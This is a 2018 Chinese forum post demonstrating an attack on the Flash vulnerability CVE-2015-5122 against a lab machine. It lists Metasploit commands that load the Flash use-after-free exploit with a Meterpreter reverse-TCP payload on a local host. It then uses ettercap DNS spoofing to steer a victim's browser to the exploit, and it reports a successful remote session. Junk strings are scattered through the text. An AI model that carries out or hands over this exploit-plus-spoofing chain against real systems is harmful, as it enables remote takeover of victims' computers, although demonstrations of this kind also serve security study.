找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1362|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" M3 |& P: E2 O 二、cve2015-5122漏洞实例演示虚拟机 1 T4 u. D8 O4 F6 ]

Y5 q, C% l8 {' }: i# l/ O

+ X h! y# T; p5 B& K' j4 O& B   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 2 J, {8 c$ Y& m

9 \/ o; F1 Q( {0 s

, a* _: A Q% C& n search cve-2015-5122如图: 6 a/ O/ m. }1 S6 h4 g

, Z0 [$ K- Q S3 J

7 _$ j3 j2 t4 |; o8 ^   + U9 Q' H" p* z& A" o( B2 a4 x# a

4 y& [6 |; p# U/ s0 N0 p

& N v) a k+ K8 @; C: D* y) ] 下面我们敲如下命令: & o, ^" U4 W3 j. G Q# e4 C" v

- `# Q2 U7 y. }* Z4 V8 L4 d+ N

2 [9 U5 R/ M1 [, K5 L5 K use exploit/multi/browser/adobe_flash_opaque_background_uaf ( g P. D' H; y

u( }1 Z' t5 @% ]6 y

" P( e' w, @( @0 \3 p set PAYLOAD windows/meterpreter/reverse_tcp 9 k$ X+ K4 K3 |' r' G- x/ N# D

+ ^( g6 z8 s. B; J2 w! x) z

$ i; p. H% e; _ set LHOST 192.168.0.109 0 e# c7 Z; W9 u+ _- A( e

8 G& _: H/ H) S& \4 }! `! H4 y

# v, N# F2 Z% B% M$ D) i set URIPATH /                        /*根目录*/ 7 l" T R4 @$ B3 L2 n

2 d9 B" H* Y3 A+ o5 r, M" N! Z1 |5 R

1 n, S* V4 h5 i: G6 C set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 " `+ @5 O3 |, n" w

* A- r8 E* M0 p

' o9 ]- A7 x' I+ O0 }( U set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 1 e0 r( E$ }3 j( m2 b

1 |; B9 {3 E! Q N9 Y& Y

0 \+ Z4 H1 G% W* D$ K8 R 然后show options如图: 0 B h. }2 O9 t! u2 y

; ]& n% J% m2 ^6 _; E0 u

* U5 D' C7 A- `4 k% o( X7 I   ) I0 |4 H$ g6 r* ], {. B8 A! n

/ |# @5 n* R- ?! G: z9 A

! q. }) z9 Q! a8 d8 s1 J 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
% B- w& `% k8 {6 b
( E# s7 ^* H, B$ w) v+ w+ u

R" E" {. ~& N( {' D2 }8 E h

2 s& \* {. @' p9 c% W+ [ 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ! l* c/ O5 ^3 c0 U

3 C U0 |- W/ W+ T9 ?

5 z, r: H L; N- N5 e. }; X; s Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf c% O. P6 ^1 e7 x( D2 i

$ Y( ^. Y, Q7 q& H9 C

( `5 @7 [2 w% r4 r7 F   + v( E1 n# F0 p8 n! D# s' S

- o# m5 z) k. z0 u. z8 Q3 B# X

; v7 [) a6 j, j( ]7 @( W% S5 G 成功了,这时候我们断开ettercap,如图: " ~: P* B' X& ?9 O

* S0 G$ \7 w* U) a4 L

9 Y/ r4 u& d3 J [. ]$ `   4 R* m! f; {% I9 d* U5 N3 f% K2 u

8 e% w0 k; d( a& H! m+ `# I

) F, X& K, z! O/ u1 H1 | Screenshot如图: ! f7 s9 d$ @) G6 @( z

9 z! P9 n( N) \' J1 H" x

# N: M# _& E; B- K- S   3 r+ }: [. h' ?( N. ^) c. ^+ s8 D, Q

1 C' z% Q3 n! p! A- B( _0 }

0 K6 d* ^# p8 L ( p3 Y1 D+ E! s+ B

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表